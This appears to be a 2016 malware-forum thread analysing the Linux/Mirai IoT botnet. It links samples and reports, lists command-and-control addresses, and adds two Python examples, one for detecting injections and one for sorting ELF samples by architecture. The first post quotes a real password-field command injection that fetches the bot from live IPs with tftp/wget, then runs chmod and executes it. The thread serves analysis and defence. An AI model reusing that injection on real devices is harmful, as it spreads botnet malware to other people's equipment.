Linux/Mirai

Forum for analysis and discussion about malware.
Xylitol
Global Moderator
Posts: 1681
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Linux/Mirai

Post by Xylitol » Sat Sep 17, 2016 1:28 pm

MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html

Sample from article:
ARM: https://www.virustotal.com/en/file/65de ... 474118654/
ARM7: https://www.virustotal.com/en/file/c483 ... 474118647/
MIPS: https://www.virustotal.com/en/file/9304 ... 474118648/
Renesas SH: https://www.virustotal.com/en/file/1bf9 ... 474118651/
PowerPC: https://www.virustotal.com/en/file/c61b ... 474118650/
SPARC: https://www.virustotal.com/en/file/d957 ... 474118708/
x86: https://www.virustotal.com/en/file/2238 ... 474118710/

And also this
ARM: https://www.virustotal.com/en/file/2727 ... 474117997/
ARM7: https://www.virustotal.com/en/file/a4b9 ... 474118004/
MIPS: https://www.virustotal.com/en/file/f110 ... 474117999/
Renesas SH: https://www.virustotal.com/en/file/b76a ... 474118000/
PowerPC: https://www.virustotal.com/en/file/849d ... 474118001/
The malware was installed on a DVR and was started with this bash injection in the password field:

Code:

Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;
There are also other platform versions; change "arm" to "mips" etc.
Thanks to 0x1BE.
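The injected password value above is a download-and-execute chain: the field content is handed to a shell, which runs tftp/wget to fetch the binary, chmod to make it executable, and then runs it. As an added example (not code from this thread or from MalwareMustDie), the Python below splits a captured field value on shell control operators and flags that download, chmod, exec sequence so a login-form log can be triaged for this class of injection. The event lines, source IPs (192.0.2.0/24 is a reserved documentation range) and file paths are constructed for the example, not taken from the thread.

```python
"""Flag download-and-execute command injection in a captured form field value.

Added example, not code from the thread or from any project it links.
The sample events, IPs and paths below are constructed.
"""
import re
from dataclasses import dataclass, field

# Shell control operators that chain commands. Splitting on them turns one
# injected field value into the separate commands the shell would run.
# "||" is listed before "|" so the alternation matches the longer token first.
_SEPARATORS = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")

_DOWNLOADERS = {"tftp", "wget", "curl", "ftpget"}
_MODE_CHANGE = {"chmod"}
# Direct execution of a freshly written file ("./name"), or busybox invoked
# with an applet name (the thread shows "/bin/busybox MIRAI" used as a marker).
_EXEC_PATTERN = re.compile(r"^(?:\./\S+|/bin/busybox\s+\S+)")


@dataclass
class Verdict:
    injected: bool
    stages: list = field(default_factory=list)


def split_commands(value: str) -> list:
    """Return the individual commands the shell would execute for `value`.

    A value such as ";tftp ... || wget ...; chmod ...; ./x" starts with an
    empty segment (the part the form expected); empty segments are dropped.
    """
    return [seg.strip() for seg in _SEPARATORS.split(value) if seg.strip()]


def classify(value: str) -> Verdict:
    """Label each command as download / chmod / exec and decide if the chain is present."""
    stages = []
    for cmd in split_commands(value):
        word = cmd.split()[0]
        base = word.rsplit("/", 1)[-1]  # "/usr/bin/wget" -> "wget"
        if base in _DOWNLOADERS:
            stages.append("download")
        elif base in _MODE_CHANGE:
            stages.append("chmod")
        elif _EXEC_PATTERN.match(cmd):
            stages.append("exec")
    # The chain we care about: a download followed, somewhere later, by execution.
    injected = "download" in stages and "exec" in stages[stages.index("download"):]
    return Verdict(injected, stages)


# Constructed events: "<source ip>\t<field name>\t<raw field value>".
SAMPLE_EVENTS = [
    "192.0.2.10\tPassword\thunter2",
    "192.0.2.11\tPassword\t;tftp -l /tmp/x -r bot.arm -g 192.0.2.50 || "
    "wget http://192.0.2.50/bot.arm -O /tmp/x; chmod 777 /tmp/x; cd /tmp; ./x 2>&1;",
    "192.0.2.12\tPassword\tpass;word",  # a separator alone is not an injection chain
]


def scan_events(events) -> list:
    """Return (source_ip, Verdict) for every event whose field value carries the chain."""
    hits = []
    for line in events:
        src, _field, value = line.split("\t", 2)
        verdict = classify(value)
        if verdict.injected:
            hits.append((src, verdict))
    return hits


if __name__ == "__main__":
    for src, verdict in scan_events(SAMPLE_EVENTS):
        print(src, "->", " > ".join(verdict.stages))
```

The classifier deliberately keys on the chain rather than on a single tool name, so an ordinary password that happens to contain a semicolon is not flagged, while a chain that swaps tftp for curl or writes to a different directory still is.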

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Fri Sep 30, 2016 1:22 pm

Investigation of Linux.Mirai's trojan family: https://st.drweb.com/static/new-www/new ... ily_en.pdf

Xylitol
Global Moderator
Posts: 1681
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Linux/Mirai

Post by Xylitol » Sat Oct 01, 2016 9:09 pm

You do not have the required permissions to view the files attached to this post.

rkhunter
Posts: 1156
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation

Re: Linux/Mirai

Post by rkhunter » Sun Oct 02, 2016 9:44 am

Xylitol wrote: MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html
Frankly speaking, I'm really glad to see that he started to do something directly related to his work, besides war with windmills, "approve" ppl in own twitter and spread rumors about own fantasies.

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Linux/Mirai

Post by ikolor » Sun Oct 02, 2016 10:45 am

connect here

184.51.1.18
184.51.1.19

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Linux/Mirai

Post by ikolor » Mon Oct 03, 2016 12:06 pm

Is there any information about a sample of the competing "Bashlight botnet"?

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Mon Oct 03, 2016 1:28 pm

ikolor wrote: Is there any information about a sample of the competing "Bashlight botnet"?
Bashlight is just another name for Gafgyt (http://www.kernelmode.info/forum/viewto ... =16&t=3505).

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Mon Oct 03, 2016 1:50 pm

ikolor wrote: connect here

184.51.1.18
184.51.1.19
Which one is connecting there? I see it's connecting to b0ts.xf0.pw (185.47.62.199)

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Linux/Mirai

Post by ikolor » Mon Oct 03, 2016 4:57 pm

Sorry, I thought I had made a mistake. Analyzing this file on this website showed me these IP numbers:

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Tue Oct 04, 2016 6:56 am

ikolor wrote: Sorry, I thought I had made a mistake. Analyzing this file on this website showed me these IP numbers:

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/
You can't analyze ELF files on malwr.com, because it doesn't have any Linux VMs, especially for such architectures as MIPS, MIPSEL, PPC, etc.
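The drop listed at the top of the thread ships one binary per architecture (ARM, MIPS, SH, PowerPC, SPARC, x86), and as tWiCe notes a sandbox only helps if it has a VM or emulator for the sample's architecture. The first triage step is therefore to read the ELF header and sort samples by machine type and byte order before submitting them anywhere. The following Python is an added example, not code from this thread, from Dr.Web or from malwr.com; the headers it parses are constructed, zero-padded stand-ins (not loadable binaries), and the e_machine values are the standard ELF constants.

```python
"""Sort ELF samples by CPU architecture and byte order from the file header.

Added example, not code from the thread or any sandbox it mentions.
The headers in SAMPLES are constructed (zero-padded, not loadable) to
exercise the parser; EM_* numbers are the standard ELF e_machine values.
"""
import struct

EM_NAMES = {
    2: "SPARC", 3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM",
    42: "SuperH", 62: "x86-64", 183: "AArch64",
}


def elf_arch(data: bytes) -> dict:
    """Return word size, byte order and machine name for an ELF image.

    Raises ValueError for anything that is not an ELF file, so a text
    dropper or a shell script in the same directory is reported, not parsed.
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]       # EI_CLASS: 1=32-bit 2=64-bit; EI_DATA: 1=LSB 2=MSB
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS/EI_DATA")
    order = "<" if ei_data == 1 else ">"
    # e_type and e_machine follow the 16-byte e_ident, each 2 bytes in file byte order.
    e_type, e_machine = struct.unpack_from(order + "HH", data, 16)
    name = EM_NAMES.get(e_machine, "unknown(%d)" % e_machine)
    # MIPS is built for both byte orders; toolchains and sandboxes call the
    # little-endian variant MIPSEL, so label it that way for the operator.
    if e_machine == 8 and ei_data == 1:
        name = "MIPSEL"
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": name,
        "type": e_type,
    }


def make_header(bits: int, endian: str, e_machine: int) -> bytes:
    """Construct a minimal ELF header for testing (constructed, not loadable)."""
    order = "<" if endian == "little" else ">"
    ident = (b"\x7fELF"
             + bytes([1 if bits == 32 else 2, 1 if endian == "little" else 2, 1, 0, 0])
             + b"\0" * 7)                      # e_ident is 16 bytes
    rest = struct.pack(order + "HH", 2, e_machine)  # e_type = ET_EXEC, then e_machine
    return (ident + rest).ljust(52 if bits == 32 else 64, b"\0")


def triage(samples: dict) -> dict:
    """Group sample names by the architecture a sandbox or emulator would need."""
    groups = {}
    for name, blob in samples.items():
        try:
            arch = elf_arch(blob)
            key = "%s %d-bit %s-endian" % (arch["machine"], arch["bits"], arch["endian"])
        except ValueError as exc:
            key = "skip: " + str(exc)
        groups.setdefault(key, []).append(name)
    return groups


# Constructed headers standing in for a multi-architecture drop like the one listed above.
SAMPLES = {
    "bot.arm": make_header(32, "little", 40),
    "bot.mips": make_header(32, "big", 8),
    "bot.mpsl": make_header(32, "little", 8),
    "bot.ppc": make_header(32, "big", 20),
    "bot.sh4": make_header(32, "little", 42),
    "bot.spc": make_header(32, "big", 2),
    "bot.x86": make_header(32, "little", 3),
    "notes.txt": b"plain text, not a binary",
}

if __name__ == "__main__":
    for key, names in sorted(triage(SAMPLES).items()):
        print(key, "->", ", ".join(names))
```

Running this over a real drop directory (read each file's first 64 bytes) tells you up front which samples a given sandbox can execute and which need a QEMU user-mode or full-system emulator for the right architecture.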
